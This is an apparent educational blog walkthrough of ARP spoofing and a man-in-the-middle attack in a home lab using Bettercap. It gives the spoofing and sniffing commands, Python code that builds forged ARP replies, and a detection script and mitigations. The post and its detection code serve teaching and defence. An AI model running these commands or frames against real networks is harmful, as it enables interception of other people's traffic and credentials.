Step-by-Step Guide to Demonstrating ARP Spoofing and Man-in-the-Middle Attacks in the Lab, by Aden Hawsh

 

ARP spoofing and man-in-the-middle attacks

  

An ARP spoofing attack happens when an attacker on a local area network (LAN) abuses the Address Resolution Protocol (ARP), the protocol that maps IP addresses to MAC addresses and carries no authentication, to intercept communication between two parties, such as a user's computer and the gateway. The attacker sends forged ARP replies so that each party's ARP cache associates the other party's IP address with the attacker's MAC address. This attack is especially dangerous in the context of the Internet of Things (IoT), since it has the potential to undermine the security of the whole home network. Placed in the middle in this way, the attacker can eavesdrop on the transmission or even manipulate the data being delivered, putting both confidentiality and integrity at risk.


An ARP spoofing attack on IoT devices has several components. First, the attacker discovers the target IoT devices on the LAN, then sends forged ARP replies so that their machine appears to be the legitimate gateway or device. This lets the attacker intercept, and possibly change, data sent between the IoT device and other networked devices such as the home router. For example, an attacker may manipulate a smart thermostat's temperature readings, causing it to switch heating on or off at the wrong time. The attacker may also capture sensitive data transmitted between the IoT device and other devices, such as login credentials or personal information, whenever it is sent without encryption.

 

A variety of measures reduce the danger of an ARP spoofing attack in IoT systems. Secure communication channels are essential: with TLS or SSH protecting every connection, an attacker who has poisoned the ARP caches can still see which hosts are talking, but cannot read or silently alter what they say. Timely security fixes and firmware updates for IoT devices close the vulnerabilities an attacker would go on to exploit from the man-in-the-middle position, and strong, regularly updated passwords stop captured or guessed credentials from being reused against the devices. Monitoring the network for the signs of ARP spoofing, such as two IP addresses resolving to the same MAC address, a gateway whose MAC address suddenly changes, or unexpected data flows to unfamiliar destinations, is critical for early detection.

Access control measures such as firewalls or virtual private networks (VPNs) limit device access to authorised users only, and because ARP spoofing only reaches hosts in the same broadcast domain, placing IoT devices on their own VLAN keeps a compromised laptop or phone on the main network from poisoning them at all. Lastly, regular security audits of the IoT network help identify and rectify weaknesses, further fortifying the network against ARP spoofing attacks.

 


Figure 1. IoT man-in-the-middle (MITM)

Step 1. Setting up.


The diagram in Figure 1 displays some of the IoT devices in our home network, along with their corresponding IP and MAC addresses. 

To capture this information we used Bettercap installed on the Parrot Security OS attacker machine. So that the VM can see all the home IoT devices, the VirtualBox network adapter is configured as a bridged adapter, which attaches the VM directly to the network adapter of the Windows Dell host machine; in the default NAT mode the VM would sit in its own private network and could neither scan the LAN nor ARP-spoof hosts on it.

  

Figure 2. My home network IoT devices' IP and MAC addresses.

My Windows machine, with the IP address 192.168.1.228 in my VirtualBox lab, will be used as the victim machine.

           

Figure 3 Windows 19 victim machine IP Address.

My Parrot Security machine with the IP address 192.168.1.193 will be used as the attacker machine, while the gateway router of my home network is 192.168.1.254, as shown in Figure 4.

           


Figure 4. My home network router and gateway IP address.

Now that we have recorded the IP and MAC addresses of the two machines and the IP address of the router (gateway), the next step is to launch the attack and demonstrate it.

 

Step 2.

I will restart Bettercap on my Parrot Security attacking machine, as Figure 5 shows. Bettercap runs as root, is told which network interface to use when it starts, and then presents its own interactive prompt where the remaining commands are typed.


Figure 5. Bettercap start command on the Parrot OS command line.

With Bettercap running, we can use its various modules for conducting man-in-the-middle (MitM) attacks. In this example we will use ARP spoofing against the victim machine. Our Parrot attack machine will be positioned between the target victim machine and the home router, acting as the router from the victim's point of view. As shown in Figure 6, all of the victim's browsing and login traffic will then be routed through our attack machine.

         

Figure 6. Showing how to use arp.spoof with the help of the 'help' command.

Step 3:

In Figure 6 above, the 'arp.spoof' module lists its parameters and commands. To become the man-in-the-middle we need to poison both ARP caches: tell the router that the victim's IP address maps to our MAC address, and tell the victim that the router's IP address maps to our MAC address. Neither side verifies these claims, because ARP has no authentication.
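The two forged replies described in this step, as an added example that is not part of the original page and is not Bettercap's own code: it builds the raw Ethernet/ARP frames that a full-duplex spoof keeps sending, decodes them, and applies them to a minimal model of the victim's ARP cache. The IP addresses are the lab's; the MAC addresses are constructed placeholders, since the page does not print them. Nothing is transmitted: putting such frames on the wire needs a raw socket and root, which Bettercap handles once 'arp.spoof on' is issued.

```python
"""Added example (not Bettercap's code): the two forged ARP replies behind a
full-duplex ARP spoof, built and decoded offline.

IP addresses are those of the lab; the MAC addresses are constructed
placeholders (the page does not print them). Nothing is sent on the wire."""
import ipaddress
import struct

ETH_P_ARP = 0x0806              # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2   # ARP opcodes

VICTIM_IP, VICTIM_MAC = "192.168.1.228", "08:00:27:11:11:11"      # Windows VM (MAC constructed)
GATEWAY_IP, GATEWAY_MAC = "192.168.1.254", "f0:f0:f0:22:22:22"    # home router (MAC constructed)
ATTACKER_IP, ATTACKER_MAC = "192.168.1.193", "08:00:27:33:33:33"  # Parrot VM (MAC constructed)


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_ip, sender_mac, target_ip, target_mac):
    """Ethernet II + ARP 'is-at' reply stating that sender_ip lives at sender_mac.

    An unsolicited reply is enough: most stacks overwrite the cache entry for
    sender_ip without ever having asked for it."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, hlen 6, plen 4
    arp += mac_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
    arp += mac_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed
    return eth + arp


def parse_arp(frame):
    """Decode an Ethernet/ARP frame into its fields; rejects anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": str(ipaddress.IPv4Address(frame[28:32])),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": str(ipaddress.IPv4Address(frame[38:42])),
    }


def full_duplex_spoof_frames(victim_ip, victim_mac, gateway_ip, gateway_mac, attacker_mac):
    """The pair that 'set arp.spoof.fullduplex true' + 'arp.spoof on' keeps sending:
    the victim is told the gateway is at our MAC, the gateway that the victim is."""
    to_victim = build_arp_reply(gateway_ip, attacker_mac, victim_ip, victim_mac)
    to_gateway = build_arp_reply(victim_ip, attacker_mac, gateway_ip, gateway_mac)
    return to_victim, to_gateway


def restore_frames(victim_ip, victim_mac, gateway_ip, gateway_mac):
    """Replies that put the true mappings back when the attack stops; skipping
    them leaves both sides pointing at a MAC that no longer answers."""
    return (build_arp_reply(gateway_ip, gateway_mac, victim_ip, victim_mac),
            build_arp_reply(victim_ip, victim_mac, gateway_ip, gateway_mac))


def apply_reply(cache, frame):
    """Minimal model of a host's ARP cache: trust every reply, keyed by sender IP."""
    fields = parse_arp(frame)
    if fields["op"] == ARP_REPLY:
        cache[fields["sender_ip"]] = fields["sender_mac"]
    return cache


if __name__ == "__main__":
    victim_cache = {GATEWAY_IP: GATEWAY_MAC}  # what 'arp -a' shows before the attack
    to_victim, to_gateway = full_duplex_spoof_frames(
        VICTIM_IP, VICTIM_MAC, GATEWAY_IP, GATEWAY_MAC, ATTACKER_MAC)
    apply_reply(victim_cache, to_victim)
    print("victim cache during attack:", victim_cache)  # gateway now maps to the attacker MAC
    for frame in restore_frames(VICTIM_IP, VICTIM_MAC, GATEWAY_IP, GATEWAY_MAC):
        apply_reply(victim_cache, frame)
    print("victim cache after restore:", victim_cache)
```

The restore pair is the part that matters for a clean lab: Bettercap sends the equivalent when the module is switched off, and without it the victim keeps a stale gateway entry until its cache times out.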


Figure 7. Setting up the interface we are using.

Step 4:

To do this, we set the 'arp.spoof.fullduplex' parameter to 'true' by typing 'set arp.spoof.fullduplex true'. Without full-duplex mode Bettercap poisons only the targets, so the router's replies would still go straight to the victim and we would see just one direction of the conversation. We also set the 'arp.spoof.targets' parameter to the IP address of our Windows victim machine; in our case the command is 'set arp.spoof.targets 192.168.1.228'.


Figure 8. The two main arp.spoof settings.

Step 5: Enable IP forwarding.

ARP spoofing makes the targets send their traffic to our machine, but by default a Linux host drops packets that are not addressed to it. Without forwarding the victim would simply lose connectivity, which turns a quiet man-in-the-middle into a noisy denial of service. To pass the traffic on to its proper destination, IP forwarding (the kernel setting net.ipv4.ip_forward) must be enabled. Bettercap normally switches it on itself when the arp.spoof module starts, but enabling it explicitly, as in Figure 9, does no harm and makes the dependency visible:


Figure 9. Enabling IP forwarding for the ARP spoofing attack.

Step 6: Start ARP spoofing.

We can now switch the module on with 'arp.spoof on'. This begins the ARP spoofing attack against the specified target: Bettercap repeatedly sends the forged replies to the victim and, in full-duplex mode, to the gateway, so that the poisoned entries do not expire.


Figure 10. Initiating ARP spoofing with the command 'arp.spoof on'.

Step 7: Start sniffing traffic.

Finally, start sniffing with 'net.sniff on'. This command begins displaying the network traffic now passing through our machine, which is where credentials sent in clear text would show up.


Figure 11. Starting the sniffing process from the attacking machine.

Next, 'net.show' prints the hosts Bettercap has discovered with their IP and MAC addresses, so we can confirm that the victim and the gateway are both listed and that the attack is running against the intended hosts.

Now let's check our Windows machine and see what has changed, as shown in Figure 12.


Figure 12. ARP cache of the Windows victim machine, shown with the 'arp -a' command.


In the victim's ARP cache, the entry for the router, 192.168.1.254, now carries the MAC address of our Parrot Security OS attacking machine instead of the router's real MAC address; it is the same MAC that 'arp -a' lists for 192.168.1.193. We have therefore successfully deceived the Windows machine into believing that we are the router, and every packet it sends off the LAN now reaches us first. Anything it transmits in clear text (HTTP logins, plain FTP or Telnet, DNS queries) can be read or altered on the way through. Traffic inside TLS or SSH stays encrypted: we still learn which hosts the victim talks to and when, but not the content or the credentials, unless we can also defeat the certificate or host-key check. That is why the encryption advice above matters more than any of the other mitigations.
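The two signs visible in Figure 12, a gateway whose MAC address has changed and one MAC address claimed by two IP addresses, are what the monitoring and static-ARP advice in this post is about. The script below is an added example, not part of the original page and not a Bettercap feature: it parses 'arp -a' output in the form Windows prints it and reports both indicators. The two tables are constructed to match the lab (victim 192.168.1.228, attacker 192.168.1.193, gateway 192.168.1.254); the MAC addresses are placeholders, and the pinned gateway MAC is assumed to have been recorded while the network was known to be clean.

```python
"""Added example (not from the page or Bettercap): checking a victim's ARP cache
for the two indicators the lab produces, given 'arp -a' output as Windows prints it.

Both tables are constructed to match the lab; MAC addresses are placeholders."""
import re

# One 'arp -a' entry line: IPv4 address, MAC (Windows uses '-', Linux ':'), type.
ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(\w+)",
    re.IGNORECASE)

# Constructed: the cache as it looked before the lab (gateway at its own MAC).
BEFORE_ATTACK = """\
Interface: 192.168.1.228 --- 0x6
  Internet Address      Physical Address      Type
  192.168.1.193         08-00-27-33-33-33     dynamic
  192.168.1.254         f0-f0-f0-22-22-22     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

# Constructed: the cache during the attack; the gateway now shows the attacker's MAC.
DURING_ATTACK = """\
Interface: 192.168.1.228 --- 0x6
  Internet Address      Physical Address      Type
  192.168.1.193         08-00-27-33-33-33     dynamic
  192.168.1.254         08-00-27-33-33-33     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""


def norm_mac(mac):
    return mac.lower().replace("-", ":")


def parse_arp_table(text):
    """Return [(ip, mac, type)] for each entry line; header lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            entries.append((m.group(1), norm_mac(m.group(2)), m.group(3).lower()))
    return entries


def is_unicast(mac):
    """Broadcast and multicast mappings legitimately repeat a MAC; ignore them.
    The low bit of the first octet is the group (multicast) bit."""
    first = int(mac.split(":")[0], 16)
    return mac != "ff:ff:ff:ff:ff:ff" and not (first & 1)


def find_spoof_indicators(entries, gateway_ip, pinned_gateway_mac):
    """Two checks:
    1. one unicast MAC claimed by two or more IPs (attacker's MAC now shown for the gateway too);
    2. the gateway entry differs from the MAC recorded when the network was known good."""
    by_mac = {}
    for ip, mac, _ in entries:
        if is_unicast(mac):
            by_mac.setdefault(mac, []).append(ip)
    duplicates = {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}

    current = {ip: mac for ip, mac, _ in entries}.get(gateway_ip)
    mismatch = None
    if current is not None and current != norm_mac(pinned_gateway_mac):
        mismatch = (norm_mac(pinned_gateway_mac), current)  # (expected, observed)
    return {"duplicate_macs": duplicates, "gateway_mismatch": mismatch}


def is_suspicious(report):
    return bool(report["duplicate_macs"]) or report["gateway_mismatch"] is not None


if __name__ == "__main__":
    for label, table in (("before", BEFORE_ATTACK), ("during", DURING_ATTACK)):
        report = find_spoof_indicators(parse_arp_table(table), "192.168.1.254", "f0-f0-f0-22-22-22")
        print(label, "suspicious" if is_suspicious(report) else "clean", report)
```

The duplicate-MAC check only fires when the attacker's own IP address also happens to be in the victim's cache, so the pinned-gateway check is the one to rely on; it is the same idea tools such as arpwatch apply across the whole LAN over time. On Windows the gateway mapping can be fixed permanently with a static neighbour entry ('netsh interface ipv4 add neighbors' with the interface name, gateway IP and its real MAC), which a forged reply then cannot overwrite.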

 Conclusion

 In conclusion, through our step-by-step demonstration of ARP spoofing in a controlled lab environment using VirtualBox, we've observed first-hand the intricacies and potential vulnerabilities inherent in the Address Resolution Protocol (ARP). By simulating an ARP spoofing attack, it became clear how attackers can easily mislead network devices into sending data to the wrong destination, facilitating man-in-the-middle attacks and jeopardizing the confidentiality and integrity of the data being transmitted.

This lab exercise, intended for educational purposes, underscores the importance of understanding network vulnerabilities and the mechanisms behind common cyber-attacks. It serves as a vital learning tool for students and professionals alike, emphasizing the need for robust network security measures and developing skills to mitigate such attacks. Implementing security practices like static ARP entries, ARP spoofing detection tools, and the use of encrypted communication protocols can significantly reduce the risk posed by ARP spoofing.

Remember, the knowledge gained from this exercise should be used responsibly and ethically to enhance cybersecurity awareness and protection. Our exploration into ARP spoofing not only highlights the vulnerabilities present in everyday network communications but also promotes a deeper understanding of how to safeguard against such vulnerabilities.


Disclaimer: 

The information provided in this blog, especially regarding the Arp-spoofing attack lab, is intended for educational purposes only. It aims to increase cybersecurity awareness and demonstrate how individuals can safeguard their networks. Under no circumstances should the content be used to engage in or promote illegal activities. Network testing should only be conducted on networks you own or have explicit permission to analyze. The author assumes no responsibility for the misuse of the information or any damages resulting from applying the techniques outlined. Always practice ethical hacking and adhere to all applicable laws and regulations.


Aden Hawsh




